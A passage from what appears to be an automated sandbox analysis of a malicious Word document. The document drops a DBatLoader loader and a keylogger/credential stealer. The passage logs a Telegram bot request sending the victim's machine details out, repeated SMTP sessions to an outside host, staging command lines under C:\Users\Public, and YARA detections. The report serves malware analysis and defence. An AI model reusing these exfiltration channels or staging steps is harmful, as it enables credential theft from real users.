2025-01-16 07:26:07 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	50031	104.21.80.1	443	8188	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:26:08 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-16 07:26:08 UTC	853	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:26:08 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2327157 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5owWs2QfAGbDuM%2Bo8fLoiafIii5AZExKixMQyorqVF8VEvU3fjroqk2sBdJ3c5C1sJ9s4pQREFU0oO7l8bzkv%2FDPjlqkDOmkzul0gs3mwEhIqzr385qEPbKa0VkMrUZolJmW6yG2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902c60275ea18c0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1962&min_rtt=1958&rtt_var=742&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1466599&cwnd=223&unsent_bytes=0&cid=8b03c31ffe29cb1c&ts=155&x=0"
2025-01-16 07:26:08 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	50038	149.154.167.220	443	8188	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:26:09 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2016/01/2025%20/%2016:18:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-16 07:26:09 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 16 Jan 2025 07:26:09 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-16 07:26:09 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 16, 2025 08:25:57.995141983 CET	587	49934	46.151.208.21	192.168.2.5	220 host.ibtikarat.net ESMTP Exim 4.98 Thu, 16 Jan 2025 10:25:55 +0300
Jan 16, 2025 08:25:57.995311022 CET	49934	587	192.168.2.5	46.151.208.21	EHLO 377142
Jan 16, 2025 08:25:58.292009115 CET	587	49934	46.151.208.21	192.168.2.5	250-host.ibtikarat.net Hello 377142 [8.46.123.189] 250-SIZE 52428800 250-LIMITS MAILMAX=100 RCPTMAX=150 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Jan 16, 2025 08:25:58.292169094 CET	49934	587	192.168.2.5	46.151.208.21	STARTTLS
Jan 16, 2025 08:25:58.570207119 CET	587	49934	46.151.208.21	192.168.2.5	220 TLS go ahead
Jan 16, 2025 08:26:04.542649984 CET	587	49989	46.151.208.21	192.168.2.5	220 host.ibtikarat.net ESMTP Exim 4.98 Thu, 16 Jan 2025 10:26:02 +0300
Jan 16, 2025 08:26:04.542778969 CET	49989	587	192.168.2.5	46.151.208.21	EHLO 377142
Jan 16, 2025 08:26:04.821646929 CET	587	49989	46.151.208.21	192.168.2.5	250-host.ibtikarat.net Hello 377142 [8.46.123.189] 250-SIZE 52428800 250-LIMITS MAILMAX=100 RCPTMAX=150 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Jan 16, 2025 08:26:04.821964025 CET	49989	587	192.168.2.5	46.151.208.21	STARTTLS
Jan 16, 2025 08:26:05.087130070 CET	587	49989	46.151.208.21	192.168.2.5	220 TLS go ahead
Jan 16, 2025 08:26:09.659199953 CET	587	50034	46.151.208.21	192.168.2.5	220 host.ibtikarat.net ESMTP Exim 4.98 Thu, 16 Jan 2025 10:26:07 +0300
Jan 16, 2025 08:26:09.659406900 CET	50034	587	192.168.2.5	46.151.208.21	EHLO 377142
Jan 16, 2025 08:26:09.942080021 CET	587	50034	46.151.208.21	192.168.2.5	250-host.ibtikarat.net Hello 377142 [8.46.123.189] 250-SIZE 52428800 250-LIMITS MAILMAX=100 RCPTMAX=150 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Jan 16, 2025 08:26:09.942240953 CET	50034	587	192.168.2.5	46.151.208.21	STARTTLS
Jan 16, 2025 08:26:10.231388092 CET	587	50034	46.151.208.21	192.168.2.5	220 TLS go ahead
Jan 16, 2025 08:26:15.992458105 CET	587	50060	46.151.208.21	192.168.2.5	220 host.ibtikarat.net ESMTP Exim 4.98 Thu, 16 Jan 2025 10:26:13 +0300
Jan 16, 2025 08:26:15.994543076 CET	50060	587	192.168.2.5	46.151.208.21	EHLO 377142
Jan 16, 2025 08:26:16.287955046 CET	587	50060	46.151.208.21	192.168.2.5	250-host.ibtikarat.net Hello 377142 [8.46.123.189] 250-SIZE 52428800 250-LIMITS MAILMAX=100 RCPTMAX=150 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Jan 16, 2025 08:26:16.288229942 CET	50060	587	192.168.2.5	46.151.208.21	STARTTLS
Jan 16, 2025 08:26:16.553910017 CET	587	50060	46.151.208.21	192.168.2.5	220 TLS go ahead
Jan 16, 2025 08:26:16.764580011 CET	587	50061	46.151.208.21	192.168.2.5	220 host.ibtikarat.net ESMTP Exim 4.98 Thu, 16 Jan 2025 10:26:14 +0300
Jan 16, 2025 08:26:16.764924049 CET	50061	587	192.168.2.5	46.151.208.21	EHLO 377142
Jan 16, 2025 08:26:17.048141956 CET	587	50061	46.151.208.21	192.168.2.5	250-host.ibtikarat.net Hello 377142 [8.46.123.189] 250-SIZE 52428800 250-LIMITS MAILMAX=100 RCPTMAX=150 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Jan 16, 2025 08:26:17.048453093 CET	50061	587	192.168.2.5	46.151.208.21	STARTTLS
Jan 16, 2025 08:26:17.318042040 CET	587	50061	46.151.208.21	192.168.2.5	220 TLS go ahead
Jan 16, 2025 08:26:22.962380886 CET	587	50062	46.151.208.21	192.168.2.5	220 host.ibtikarat.net ESMTP Exim 4.98 Thu, 16 Jan 2025 10:26:20 +0300
Jan 16, 2025 08:26:22.962624073 CET	50062	587	192.168.2.5	46.151.208.21	EHLO 377142
Jan 16, 2025 08:26:23.241081953 CET	587	50062	46.151.208.21	192.168.2.5	250-host.ibtikarat.net Hello 377142 [8.46.123.189] 250-SIZE 52428800 250-LIMITS MAILMAX=100 RCPTMAX=150 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Jan 16, 2025 08:26:23.241259098 CET	50062	587	192.168.2.5	46.151.208.21	STARTTLS
Jan 16, 2025 08:26:23.502204895 CET	587	50062	46.151.208.21	192.168.2.5	220 TLS go ahead

Target ID:	0
Start time:	02:25:15
Start date:	16/01/2025
Path:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x8a0000
File size:	1'620'872 bytes
MD5 hash:	1A0C2C2E7D9C4BC18E91604E9B0C7678
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:25:22
Start date:	16/01/2025
Path:	C:\Windows\SysWOW64\brightness.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\brightness.exe
Imagebase:	0x400000
File size:	854'016 bytes
MD5 hash:	AEA0BCDBDDBEABFDE26F53671890D1B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000003.2179264419.000000007FCB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 45%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:25:26
Start date:	16/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\Public\NsltarpnF.cmd" "
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	02:25:26
Start date:	16/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	02:25:28
Start date:	16/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	02:25:28
Start date:	16/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	02:25:29
Start date:	16/01/2025
Path:	C:\Users\Public\Libraries\npratlsN.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\npratlsN.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000D.00000002.3820648625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.3852283482.000000001CC41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000D.00000002.3852283482.000000001CC41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000D.00000001.2243005056.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.3856159190.000000001DC16000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.3856159190.000000001DC16000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000D.00000002.3852283482.000000001CC7A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000D.00000002.3852283482.000000001CB71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	02:25:41
Start date:	16/01/2025
Path:	C:\Users\Public\Libraries\Nsltarpn.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Nsltarpn.PIF"
Imagebase:	0x400000
File size:	854'016 bytes
MD5 hash:	AEA0BCDBDDBEABFDE26F53671890D1B7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 100%, Avira Detection: 45%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	02:25:41
Start date:	16/01/2025
Path:	C:\Users\Public\Libraries\npratlsN.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\npratlsN.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000F.00000002.3853601584.000000002D9F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000F.00000002.3853601584.000000002D8E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3857060736.000000002E981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.3857060736.000000002E981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000F.00000002.3820808397.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000F.00000001.2369555463.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	02:25:49
Start date:	16/01/2025
Path:	C:\Users\Public\Libraries\Nsltarpn.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Nsltarpn.PIF"
Imagebase:	0x400000
File size:	854'016 bytes
MD5 hash:	AEA0BCDBDDBEABFDE26F53671890D1B7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	02:25:49
Start date:	16/01/2025
Path:	C:\Users\Public\Libraries\npratlsN.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\npratlsN.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000011.00000002.3820791645.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 